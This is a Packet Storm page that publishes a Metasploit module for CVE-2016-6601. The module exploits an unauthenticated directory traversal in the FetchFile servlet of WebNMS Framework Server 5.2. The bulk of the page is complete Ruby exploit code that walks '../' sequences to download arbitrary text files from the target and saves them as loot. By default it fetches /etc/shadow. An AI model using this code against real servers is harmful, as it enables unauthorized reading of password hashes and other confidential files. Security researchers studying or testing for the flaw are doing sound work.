exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WebNMS Framework Server Arbitrary Text File Download

WebNMS Framework Server Arbitrary Text File Download
Posted Aug 31, 2024
Authored by Pedro Ribeiro | Site metasploit.com

This Metasploit module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an unauthenticated user to download files off the file system by using a directory traversal attack on the FetchFile servlet. Note that only text files can be downloaded properly, as any binary file will get mangled by the servlet. Also note that for Windows targets you can only download files that are in the same drive as the WebNMS installation. This Metasploit module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux.

tags | exploit
systems | linux, windows
advisories | CVE-2016-6601
SHA-256 | d53e20ca4f6748cc2ecc344982adb4173a0413426b1595cb3eb67d5d845d913d

WebNMS Framework Server Arbitrary Text File Download

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WebNMS Framework Server Arbitrary Text File Download',
'Description' => %q{
This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
unauthenticated user to download files off the file system by using a directory
traversal attack on the FetchFile servlet.
Note that only text files can be downloaded properly, as any binary file will get
mangled by the servlet. Also note that for Windows targets you can only download
files that are in the same drive as the WebNMS installation.
This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
Windows and Linux.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2016-6601'],
[ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2016/Aug/54' ]
],
'DisclosureDate' => '2016-07-04'
)
)
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 9090]),
OptString.new('TARGETURI', [ true, 'WebNMS path', '/']),
OptString.new('FILEPATH', [ false, 'The filepath of the file you want to download', '/etc/shadow']),
OptString.new('TRAVERSAL_PATH', [ false, 'The traversal path to the target file (if you know it)']),
OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10])
],
self.class
)
end

def check_filename(path)
valid = true
invalid_chars = [':', '?', '*', '|', '"', '<', '>']
invalid_chars.each do |i|
if path.include? i
valid = false
break
end
end
end

def run
if check_filename(datastore['filepath'])
file = nil
if datastore['TRAVERSAL_PATH'].nil?
traversal_size = datastore['MAX_TRAVERSAL']
file = get_file(datastore['FILEPATH'], traversal_size)
else
file = get_file(datastore['TRAVERSAL_PATH'], 1)
end
if file.nil?
print_error("#{peer} - Failed to download the specified file.")
return
else
vprint_line(file)
fname = File.basename(datastore['FILEPATH'])

path = store_loot(
'webnms.http',
'text/plain',
datastore['RHOST'],
file,
fname
)
print_good("File download successful, file saved in #{path}")
end
else
print_error('Module Failed: Invalid Filename')
end
end

def get_file(path, depth)
while depth > 0
file_name = '../' * depth + path
vprint_status("Attempting to get file: #{file_name}")
begin
res = send_request_cgi(
{
'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),
'method' => 'GET',
'vars_get' => { 'fileName' => file_name }
}
)
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
Rex::HostUnreachable, Errno::ECONNRESET => e
print_error("Connect to the target: #{e.class} - #{e.message}")
return nil
end
if res &&
res.code == 200 &&
!res.body.to_s.empty? &&
(res.body.to_s.include? 'File Found')
return res.body.to_s
end

depth -= 1
end
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close